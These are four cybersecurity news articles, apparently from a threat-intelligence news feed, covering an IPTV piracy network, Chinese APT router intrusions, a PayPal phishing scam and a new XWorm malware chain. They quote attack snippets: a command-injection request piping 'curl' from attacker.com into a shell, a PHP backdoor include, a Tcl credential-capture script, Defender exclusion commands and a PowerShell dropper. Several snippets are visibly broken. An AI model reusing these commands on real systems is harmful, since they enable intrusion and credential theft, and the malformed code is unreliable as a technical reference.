A sprawling network of illicit Internet Protocol Television (IPTV) services has been discovered, operating across more than 1,100 domains and in excess of 10,000 IP addresses.

This sprawling infrastructure, which has remained active for several years, delivers unauthorized streams of premium content—including major sports leagues, subscription services, and on-demand platforms—without licensing agreements.

Silent Push analysts noted that this network’s use of both high-volume IP address pools and rapidly rotating domains represents a significant escalation in piracy tactics, making traditional takedown processes nearly futile.

At its core, the network relies on customized IPTV panels built around modified open-source software such as Stalker Portal and Xtream UI.

These panels facilitate automated user authentication and stream distribution, allowing operators to provision hundreds of thousands of simultaneous sessions.

Rather than depending on a single front-end domain, the operators employ a large pool of proxy domains—each resolving to multiple shared IP addresses—to obfuscate the true origin of the streams.

Silent Push researchers identified two companies, XuiOne and Tiyansoft, and an individual, Nabi Neamati of Herat, Afghanistan, as principal beneficiaries of this infrastructure.

The attack vectors begin with server-side exploitation and credential harvesting. Malicious actors compromise under-protected web hosts or exploit outdated control panels to install custom modules that inject backdoors into legitimate streaming control software.

In many cases, operators gain initial access by exploiting default credentials on cPanel, Plesk, and Stalker Portal installations.

Once access is secured, a deployment script—often obfuscated via Base64 encoding—pushes modified PHP files and cron jobs to automate the registration of new domains and the rotation of stream endpoints.

Silent Push analysts identified one such script that uses the following code snippet to register new virtual hosts:

$domain = trim(shell_exec('wp option get siteurl'));
$ipList = ['158.220.114.199','46.202.197.208'];
foreach ($ipList as $ip) {
    shell_exec("echo '$domain IN A $ip' >> /etc/bind/db.piracy");
}
shell_exec('rndc reload');

Despite repeated takedown requests, the network’s agility in rotating both domains and IP addresses allows it to remain operational.

New domains appear almost daily, with each resolving to clusters of dynamic IP addresses provisioned via bullet-proof hosting providers.

This resilient structure poses a formidable challenge to rights holders and law enforcement agencies attempting to disrupt the service.

Infection Mechanism Through Control Panel Exploits

A particularly insidious aspect of this IPTV piracy network is its infection mechanism, which centers on compromised control panels.

Operators survey the internet for misconfigured or outdated installations of Stalker Portal and Xtream UI, using automated scanners to detect vulnerable endpoints on ports 80, 8080, and 2095.

Upon identifying a target, they deploy a multi-stage payload that begins with a low-profile reconnaissance module.

This module enumerates existing user accounts, collects hashed credentials, and exfiltrates configuration files containing API keys.

A second stage installs a persistent backdoor by modifying the config.php file within the panel’s directory:-

if (!defined('IPTV_INIT')) {
    define('IPTV_INIT', true);
    require_once __DIR__ . '/backdoor.php';
}

The backdoor script, backdoor.php, establishes a reverse shell to a command-and-control server whenever an administrator logs in, effectively granting the attackers full control over the panel.

This persistent foothold enables continuous updates to the hosting infrastructure, seamless domain registration, and dynamic IP assignment—ensuring that new entry points replace any that have been taken down.

As a result, the network can sustain large-scale piracy operations with minimal interruption.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Massive IPTV Hosted Across More Than 1,000 Domains and Over 10,000 IP Addresses appeared first on Cyber Security News.

Over the past several years, a concerted campaign by Chinese state-sponsored Advanced Persistent Threat (APT) groups has exploited critical vulnerabilities in enterprise-grade routers to establish long-term footholds within global telecommunications and government networks.

These actors, often identified under monikers such as Salt Typhoon and OPERATOR PANDA, have systematically targeted provider edge (PE) and customer edge (CE) devices from leading vendors, leveraging publicly disclosed Common Vulnerabilities and Exposures (CVEs) to gain initial unauthorized access.

Their operations have demonstrated a high degree of stealth, chaining multiple exploits to move laterally and evade conventional detection tools.

The typical multi-stage attack flow begins with a web-component injection and culminating in embedded packet capture.

In initial intrusion attempts, threat actors commonly exploit CVE-2024-21887 in Ivanti Connect Secure and CVE-2024-3400 within Palo Alto Networks PAN-OS GlobalProtect.

These flaws allow remote code execution through crafted HTTP requests, granting attackers a foothold in the router’s privileged management interface.

While researchers noted that once access is achieved, the actors pivot swiftly, exploiting older vulnerabilities such as CVE-2018-0171 in Cisco IOS smart install, and CVE-2023-20198 in IOS XE web management modules, creating a dependable chain of escalation and persistence.

Cyble analysts identified rapid weaponization of publicly available proof-of-concept exploit code, often tailored in Python or Tcl scripts to suit specific router environments.

A representative snippet used in these campaigns is shown here, demonstrating command injection via the web management interface:-

import requests

url = "https[:]//192.0.2.1/+CSCOE+/translation-table?type=misc&text_scale=1"
payload = {"command"[:] "system ('curl http[:]//attacker.com/shell[.]sh | sh')"}
response = requests[.]post (url, data=payload, verify=False)
print (response[.]status_code, response[.]text)

Leveraging this technique, attackers achieve remote shell execution, subsequently deploying custom tooling to harvest configuration files, credentials, and session data.

Persistence Tactics

After initial access, Chinese APT groups focus on embedding themselves deeply within the router’s operating environment to ensure longevity.

They alter Access Control Lists (ACLs) to whitelist attacker-controlled IP addresses and open non-standard ports such as 32768 and 8081 for covert access.

In many cases, malefactors exploit Cisco’s Embedded Packet Capture (EPC) functionality to siphon TACACS+ and RADIUS authentication traffic, effectively harvesting clear-text credentials. To automate this, they deploy Tcl-based scripts stored in the router’s flash memory:

package require json
set cap Cmd [list "ip" "packet" "capture" "point-to-point" "rtl" "1000"]
exec {*}$capCmd > flash:auth_capture[.]pcap

These scripts run at boot time, triggered via altered startup configurations, creating persistent PCAP files that are periodically exfiltrated over encrypted GRE tunnels.

By manipulating the AAA (Authentication, Authorization, Accounting) configuration, the actors redirect logs and disable alerting features, effectively blinding enterprise defenders.

Through these methods, the compromised devices become reliable launchpads for broader enterprise infiltration, allowing the APT actors to maintain a stealthy presence for months or even years.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Chinese APT Hackers Exploit Router Vulnerabilities to Infiltrate Enterprise Environments appeared first on Cyber Security News.

A sophisticated phishing campaign targeting PayPal’s massive user base has emerged, utilizing deceptive “Set up your account profile” emails to compromise user accounts through an ingenious secondary user addition scheme.

The attack leverages advanced email spoofing techniques and psychological manipulation tactics to bypass traditional security awareness measures, representing a significant evolution in financial fraud methodologies.

The scam operates through carefully crafted emails that appear to originate from legitimate PayPal addresses such as service@paypal.com and service@paypal.co.uk.

However, threat actors employ address spoofing techniques that exploit inherent weaknesses in email authentication protocols.

The attackers configure their email clients to display fraudulent sender addresses, taking advantage of the fact that most email systems lack stringent verification mechanisms for “From” field authenticity.

Recipients receive messages claiming detection of a new payment profile with charges of $910.45 USD at Kraken.com, a legitimate cryptocurrency trading platform.

The emails feature authentic PayPal branding and layout elements, likely extracted from genuine PayPal communications.

Malwarebytes analysts noted several critical red flags within these messages, including unusual recipient addresses utilizing compromised domains with “.test-google-a.com” extensions, subject lines misaligned with email content, and absence of personalized greetings that legitimate PayPal communications always include.

Sophisticated Account Takeover Mechanism

The campaign’s most insidious element involves redirecting victims to authentic PayPal infrastructure rather than traditional phishing sites.

When users click the embedded links, they unwittingly initiate PayPal’s legitimate secondary user addition process instead of the expected profile setup or payment dispute resolution.

This technique represents a paradigm shift from conventional phishing approaches, as it exploits PayPal’s own functionality to achieve malicious objectives.

The secondary user addition process grants extensive account privileges, including payment authorization capabilities.

Once successfully added as a secondary user, threat actors gain sufficient access to drain victims’ PayPal balances and conduct unauthorized transactions.

This approach bypasses many traditional anti-phishing measures since the destination URLs resolve to legitimate PayPal domains, making detection significantly more challenging for both automated security systems and end users.

The campaign has reportedly operated for over a month, targeting PayPal’s 434 million active users through databases of email addresses associated with PayPal accounts or previous PayPal interactions.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Threat Actors Attack PayPal Users in New Account Profile Set up Scam appeared first on Cyber Security News.

Emerging quietly in mid-2025, the XWorm backdoor has evolved into a deceptively sophisticated threat that preys on both user confidence and system conventions.

Initial reports surfaced when organizations noted a sudden uptick in obscure .lnk-based phishing emails masquerading as benign documents.

Security teams quickly observed that these shortcuts triggered hidden PowerShell routines rather than opening any expected files, suggesting the emergence of a new infection chain.

Within days, enterprises across multiple sectors reported anomalous network connections to unfamiliar IP addresses, hinting at an active Command and Control (C2) infrastructure.

As the campaign gained momentum, Trellix analysts identified a notable departure from XWorm’s earlier, more predictable methods.

Gone were the simplistic batch scripts and obvious VBScript payloads; instead, the attackers now deploy a multi-stage mechanism that leverages both social engineering and technical subterfuge.

The initial .lnk file, often delivered via targeted spear-phishing, drops a benign-looking text artifact before silently fetching “discord.exe” from a remote host.

Upon execution, this .NET-based executable unpacks and launches two additional components—main.exe and system32.exe—with the latter serving as the core XWorm payload.

Once system32.exe takes hold, it performs rigorous environment checks, aborting if it detects a sandbox or virtual machine.

If the host is deemed genuine, the malware duplicates itself as Xclient.exe and establishes persistence by creating both a scheduled task and a registry Run key.

System defenses are methodically dismantled: Windows Firewall policies are disabled via modifications to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DisableFirewall, while PowerShell execution policies are bypassed to white-list the malicious processes.

ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\Temp\discord.exe"
ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess "Xclient.exe"

These commands ensure XWorm operates under minimal scrutiny, allowing unfettered access to the compromised environment.

Infection Mechanism and Deployment

The heart of XWorm’s new chain lies in its ingenious use of base64 encoding combined with Rijndael decryption, allowing the payload to remain concealed until execution.

The initial .lnk file embeds a base64 string that decodes into a one-line PowerShell command.

This command retrieves “discord.exe” from hxxp://85[.]203[.]4[.]232:5000/Discord.exe, saving it to the Temp directory before launching it stealthily.

$payload = "ZG93bmxvYWQgZnJvbSAgaHR0cDovLzg1LjIwMy4zLjIzMjo1MDAwL0Rpc2NvcmQuZXhl"
[IO.File]::WriteAllBytes("$env:TEMP\discord.exe", [Convert]::FromBase64String($payload))
Start-Process "$env:TEMP\discord.exe" -WindowStyle Hidden

After activation, discord.exe drops main.exe and system32.exe, each packed with advanced obfuscation techniques to thwart static analysis.

Main.exe’s resource section harbors embedded Python modules, while system32.exe implements early TLS callbacks to execute critical code before any security hooks can intervene.

This layered approach not only complicates detection but ensures that each component reinforces the next, yielding a resilient, stealth-focused infection chain that challenges conventional defense strategies.

Through this evolution, XWorm demonstrates how blending social engineering, multi-stage payload delivery, and sophisticated cryptographic concealment can enable adversaries to outpace existing detection technologies, maintaining both stealth and persistence within targeted networks.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post XWorm Malware With New Infection Chain Evade Detection Exploiting User and System Trust appeared first on Cyber Security News.